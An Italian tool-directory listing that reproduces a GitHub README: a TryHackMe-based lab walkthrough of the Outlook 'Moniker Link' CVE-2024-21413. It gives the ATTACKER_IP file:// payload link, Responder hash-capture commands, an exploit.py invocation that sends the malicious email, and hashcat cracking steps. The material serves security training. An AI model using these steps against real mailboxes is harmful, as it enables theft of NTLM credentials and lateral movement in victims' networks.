Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Password CrackingAnalisi delle VulnerabilitàExploitMovimento LateralePhishingCTFApprendimento e FormazioneSicurezza EmailLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Un caso di studio del CVE-2024-21413. Usato come parametro la stanza di TryHackMe Moniker Link (CVE-2024-21413). Fatte modifiche con claude code nell'exploit.

Vedi Repository
75 mesi faNon ancora revisionato

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + Furto di Credenziali NTLM

⚠️ Avviso Legale: Questo repository è esclusivamente a scopo educativo e di ricerca sulla sicurezza. Tutte le dimostrazioni sono state eseguite in ambienti controllati e isolati. L'uso di queste tecniche contro sistemi senza autorizzazione esplicita è illegale e antietico.


📋 Indice

  • Panoramica
  • Come Funziona la Vulnerabilità
  • Ambiente di Laboratorio
  • Dimostrazione Passo Dopo Passo
  • Script dell'Exploit
  • Diagramma dell'Attacco
  • Mitigazione e Difesa
  • CVE Breakdown
  • Riferimenti

🔍 Panoramica

CampoDettaglio
CVECVE-2024-21413
Divulgazione13 febbraio 2024 (Patch Tuesday)
CVSS Score9.8 (Critico)
ProdottoMicrosoft Outlook
TipoRCE + Furto di Credenziali (Hash NTLM)
VettoreRete / E-mail (senza autenticazione preventiva)
InterazioneRichiede l'interazione dell'utente (click sul link)
SoprannomeMoniker Link

La CVE-2024-21413 è una vulnerabilità critica in Microsoft Outlook che consente a un attaccante di:

  1. Rubare credenziali NTLM della vittima forzando un'autenticazione SMB automatica
  2. Eseguire codice in remoto sulla macchina bersaglio tramite un link malevolo in un'e-mail

Il nome "Moniker Link" deriva dallo sfruttamento dei Moniker COM (Component Object Model) — un meccanismo di Windows per referenziare oggetti tramite stringhe — per bypassare le protezioni di Outlook contro i link file://.


🧠 Come Funziona la Vulnerabilità

Il Problema: Bypass della Protected View

Normalmente, Outlook blocca i link file:// che puntano a risorse di rete, mostrando un avviso di sicurezza (Protected View). Il difetto risiede nel modo in cui Outlook elabora gli URL che contengono il carattere ! — un separatore di Moniker.

Lo Sfruttamento

Un link malevolo nel formato:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

Il carattere ! fa sì che il parser di Outlook interpreti l'URL come un riferimento a un Moniker COM, ignorando i normali controlli di sicurezza. Il risultato:

  • La macchina della vittima tenta di autenticarsi automaticamente via SMB sul server dell'attaccante
  • Durante questa autenticazione, l'hash NTLM della vittima viene trasmesso
  • Questo hash può essere usato in attacchi Pass-the-Hash o decifrato offline

Flusso Semplificato

root@kitploit:~
L'attaccante invia un'e-mail → La vittima clicca sul link → Outlook elabora l'URL con "!"
→ Bypass della Protected View → Connessione SMB automatica → Hash NTLM catturato

🖥️ Ambiente di Laboratorio

Per riprodurre questo caso di studio in sicurezza:

MacchinaSistema OperativoRuolo
AttaccanteKali LinuxListener SMB + Exploit
BersaglioWindows 10/11 con Outlook vulnerabileVittima

Importante: Usa una rete isolata (NAT o Host-Only in VirtualBox/VMware). Non eseguire mai su reti reali.

Strumenti Necessari

root@kitploit:~
# Responder — listener SMB/HTTP per la cattura degli hash
sudo apt install responder

# Python 3 — per eseguire l'exploit
python3 --version

# Verificare la connettività tra le macchine
ping <IP_BERSAGLIO>

🚀 Dimostrazione Passo Dopo Passo

Passo 1 — Identificare l'IP della Macchina Attaccante

root@kitploit:~
ip a | grep inet
# Annota l'IP dell'interfaccia che comunica con il bersaglio (es: 192.168.56.10)

Passo 2 — Avviare il Responder

Il Responder crea un server SMB fittizio che cattura gli hash di autenticazione NTLM.

root@kitploit:~
sudo responder -I eth0 -v
# Sostituisci eth0 con la tua interfaccia di rete

Output atteso:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-BERSAGLIO\utente
[SMB] NTLMv2-SSP Hash     : utente::DESKTOP-BERSAGLIO:...

Passo 3 — Eseguire l'Exploit

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVER_EMAIL> \
  --attacker-ip 192.168.56.10

Passo 4 — Attendere che la Vittima Clicchi sul Link

Quando la vittima apre l'e-mail e clicca sul link, il Responder cattura automaticamente l'hash NTLM. Questo hash può essere:

  • Analizzato per identificare l'account compromesso
  • Usato in un attacco Pass-the-Hash per l'autenticazione laterale nella rete
  • Inviato a Hashcat/John per tentare di decifrarlo offline:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Script dell'Exploit

Vedi il file exploit.py per lo script completo e commentato.


📊 Diagramma dell'Attacco

Vedi il file diagrama-ataque.html per una visualizzazione interattiva del flusso completo dell'attacco.


🛡️ Mitigazione e Difesa

Vedi il file MITIGACAO.md per la guida completa a mitigazione e difesa.


📄 CVE Breakdown

Vedi il file CVE-BREAKDOWN.md per l'analisi tecnica dettagliata della vulnerabilità.


📚 Riferimenti

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 Autore

Caso di studio sviluppato come parte dell'addestramento pratico in sicurezza offensiva tramite TryHackMe.

Questo progetto segue i principi di responsible disclosure e ethical hacking. Tutti i contenuti qui presenti mirano all'educazione e al miglioramento della postura di sicurezza.

Scarica lo strumento